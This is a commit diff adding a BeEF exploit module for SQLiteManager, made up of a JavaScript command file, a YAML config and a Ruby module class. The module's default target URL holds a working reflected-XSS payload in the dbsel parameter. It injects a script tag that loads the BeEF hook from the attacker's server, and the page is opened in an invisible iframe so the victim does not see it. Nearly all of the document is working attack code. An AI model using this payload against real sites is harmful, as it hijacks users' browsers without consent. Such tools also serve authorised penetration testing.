Add SQLiteManager XSS module

modules/exploits/sqlitemanager_xss/command.js

@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var uri = '<%= @uri.gsub(/'/, "\\'") %>'; 
+
+	var serendipity_iframe = beef.dom.createInvisibleIframe();
+	serendipity_iframe.setAttribute('src', uri);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+});
+

modules/exploits/sqlitemanager_xss/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        sqlitemanager_xss:
+            enable: true
+            category: ["Exploits", "XSS"]
+            name: "SQLiteManager XSS"
+            description: "Attempts to hook SQLiteManager using XSS.<br/>Tested on version 1.2.4 however other versions are likely to be vulnerable."
+            authors: ["bcoles"]
+            target:
+                unknown: ["ALL"]

modules/exploits/sqlitemanager_xss/module.rb

@@ -0,0 +1,23 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Sqlitemanager_xss < BeEF::Core::Command
+
+	def self.options
+
+		configuration = BeEF::Core::Configuration.instance
+		hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+
+		return [
+			{'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://127.0.0.1/sqlite/index.php?dbsel=1"><script src="'+hook_uri+'"></script><p+"'}
+		]
+
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end